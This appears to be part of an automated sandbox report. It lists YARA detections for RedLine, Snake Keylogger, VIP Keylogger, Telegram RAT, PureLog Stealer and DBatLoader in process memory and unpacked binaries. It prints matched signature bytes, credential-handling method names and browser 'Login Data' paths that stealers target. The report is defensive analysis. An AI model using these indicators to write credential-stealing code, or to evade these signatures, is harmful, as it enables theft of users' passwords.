00000006.00000001.1720780507.0000000000ED0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000A.00000002.2971876015.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x806a0:$a1: get_encryptedPassword 0x80674:$a2: get_encryptedUsername 0x80738:$a3: get_timePasswordChanged 0x80650:$a4: get_passwordField 0x806b6:$a5: set_encryptedPassword 0x80483:$a7: get_logins 0x7bafe:$a10: KeyLoggerEventArgs 0x7bacd:$a11: KeyLoggerEventArgsEventHandler 0x80557:$a13: _encryptedPassword
00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
00000006.00000002.3000201227.000000001D2A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x806a0:$a1: get_encryptedPassword 0x80674:$a2: get_encryptedUsername 0x80738:$a3: get_timePasswordChanged 0x80650:$a4: get_passwordField 0x806b6:$a5: set_encryptedPassword 0x80483:$a7: get_logins 0x7bafe:$a10: KeyLoggerEventArgs 0x7bacd:$a11: KeyLoggerEventArgsEventHandler 0x80557:$a13: _encryptedPassword
00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3000201227.000000001D36F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: fptrsiaN.pif PID: 5316	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: fptrsiaN.pif PID: 5316	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: fptrsiaN.pif PID: 5316	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: fptrsiaN.pif PID: 5316	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x44018:$a1: get_encryptedPassword 0xc6b37:$a1: get_encryptedPassword 0x2ff813:$a1: get_encryptedPassword 0x344bb1:$a1: get_encryptedPassword 0x43fec:$a2: get_encryptedUsername 0xc6b0b:$a2: get_encryptedUsername 0x2ff7e7:$a2: get_encryptedUsername 0x344b85:$a2: get_encryptedUsername 0x440b0:$a3: get_timePasswordChanged 0xc6bcf:$a3: get_timePasswordChanged 0x2ff8ab:$a3: get_timePasswordChanged 0x344c49:$a3: get_timePasswordChanged 0x43fc8:$a4: get_passwordField 0xc6ae7:$a4: get_passwordField 0x2ff7c3:$a4: get_passwordField 0x344b61:$a4: get_passwordField 0x4402e:$a5: set_encryptedPassword 0xc6b4d:$a5: set_encryptedPassword 0x2ff829:$a5: set_encryptedPassword 0x344bc7:$a5: set_encryptedPassword 0x43e04:$a7: get_logins
Process Memory Space: fptrsiaN.pif PID: 1196	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: fptrsiaN.pif PID: 1196	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: fptrsiaN.pif PID: 1196	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: fptrsiaN.pif PID: 1196	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x181458:$a1: get_encryptedPassword 0x1d82a4:$a1: get_encryptedPassword 0x27d7c1:$a1: get_encryptedPassword 0x2cea0e:$a1: get_encryptedPassword 0x18142c:$a2: get_encryptedUsername 0x1d8278:$a2: get_encryptedUsername 0x27d795:$a2: get_encryptedUsername 0x2ce9e2:$a2: get_encryptedUsername 0x1814f0:$a3: get_timePasswordChanged 0x1d833c:$a3: get_timePasswordChanged 0x27d859:$a3: get_timePasswordChanged 0x2ceaa6:$a3: get_timePasswordChanged 0x181408:$a4: get_passwordField 0x1d8254:$a4: get_passwordField 0x27d771:$a4: get_passwordField 0x2ce9be:$a4: get_passwordField 0x18146e:$a5: set_encryptedPassword 0x1d82ba:$a5: set_encryptedPassword 0x27d7d7:$a5: set_encryptedPassword 0x2cea24:$a5: set_encryptedPassword 0x181244:$a7: get_logins
Process Memory Space: fptrsiaN.pif PID: 2836	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: fptrsiaN.pif PID: 2836	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: fptrsiaN.pif PID: 2836	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: fptrsiaN.pif PID: 2836	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x143ad2:$a1: get_encryptedPassword 0x1b80f1:$a1: get_encryptedPassword 0x32524a:$a1: get_encryptedPassword 0x34ed83:$a1: get_encryptedPassword 0x143aa6:$a2: get_encryptedUsername 0x1b80c5:$a2: get_encryptedUsername 0x32521e:$a2: get_encryptedUsername 0x34ed57:$a2: get_encryptedUsername 0x143b6a:$a3: get_timePasswordChanged 0x1b8189:$a3: get_timePasswordChanged 0x3252e2:$a3: get_timePasswordChanged 0x34ee1b:$a3: get_timePasswordChanged 0x143a82:$a4: get_passwordField 0x1b80a1:$a4: get_passwordField 0x3251fa:$a4: get_passwordField 0x34ed33:$a4: get_passwordField 0x143ae8:$a5: set_encryptedPassword 0x1b8107:$a5: set_encryptedPassword 0x325260:$a5: set_encryptedPassword 0x34ed99:$a5: set_encryptedPassword 0x1438be:$a7: get_logins
Click to see the 103 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.fptrsiaN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
10.2.fptrsiaN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
15.1.fptrsiaN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
15.2.fptrsiaN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
1.2.x.exe.213963a8.6.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x59ee0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x3ceb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x3d530:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x5bbba:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x5b800:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x5acb8:$s6: constructor or from DllMain.
15.2.fptrsiaN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
6.1.fptrsiaN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
1.2.x.exe.213d31d8.7.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.2.fptrsiaN.pif.242d0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fptrsiaN.pif.242d0000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fptrsiaN.pif.242d0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fptrsiaN.pif.242d0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.fptrsiaN.pif.242d0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3db5a:$a1: get_encryptedPassword 0x3db2e:$a2: get_encryptedUsername 0x3dbf2:$a3: get_timePasswordChanged 0x3db0a:$a4: get_passwordField 0x3db70:$a5: set_encryptedPassword 0x3d93d:$a7: get_logins 0x38fb8:$a10: KeyLoggerEventArgs 0x38f87:$a11: KeyLoggerEventArgsEventHandler 0x3da11:$a13: _encryptedPassword
10.2.fptrsiaN.pif.242d0000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48c88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4832b:$a3: \Google\Chrome\User Data\Default\Login Data 0x48588:$a4: \Orbitum\User Data\Default\Login Data 0x48f67:$a5: \Kometa\User Data\Default\Login Data
10.2.fptrsiaN.pif.242d0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b70d:$s1: UnHook 0x3b6a9:$s2: SetHook 0x3b6e2:$s3: CallNextHook 0x3b671:$s4: _hook
9.2.Naisrtpf.PIF.210cab18.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x59ee0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x3ceb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x3d530:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x5bbba:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x5b800:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x5acb8:$s6: constructor or from DllMain.
15.1.fptrsiaN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.Naisrtpf.PIF.210cab18.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x38eb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x39530:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
6.2.fptrsiaN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
6.2.fptrsiaN.pif.1ce59d46.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.fptrsiaN.pif.1ce59d46.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.fptrsiaN.pif.1ce59d46.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.fptrsiaN.pif.1ce59d46.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.fptrsiaN.pif.1ce59d46.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3db5a:$a1: get_encryptedPassword 0x3db2e:$a2: get_encryptedUsername 0x3dbf2:$a3: get_timePasswordChanged 0x3db0a:$a4: get_passwordField 0x3db70:$a5: set_encryptedPassword 0x3d93d:$a7: get_logins 0x38fb8:$a10: KeyLoggerEventArgs 0x38f87:$a11: KeyLoggerEventArgsEventHandler 0x3da11:$a13: _encryptedPassword
6.2.fptrsiaN.pif.1ce59d46.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48c88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4832b:$a3: \Google\Chrome\User Data\Default\Login Data 0x48588:$a4: \Orbitum\User Data\Default\Login Data 0x48f67:$a5: \Kometa\User Data\Default\Login Data
6.2.fptrsiaN.pif.1ce59d46.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b70d:$s1: UnHook 0x3b6a9:$s2: SetHook 0x3b6e2:$s3: CallNextHook 0x3b671:$s4: _hook
6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
6.3.fptrsiaN.pif.1b2ec7f8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.3.fptrsiaN.pif.1b2ec7f8.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.3.fptrsiaN.pif.1b2ec7f8.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
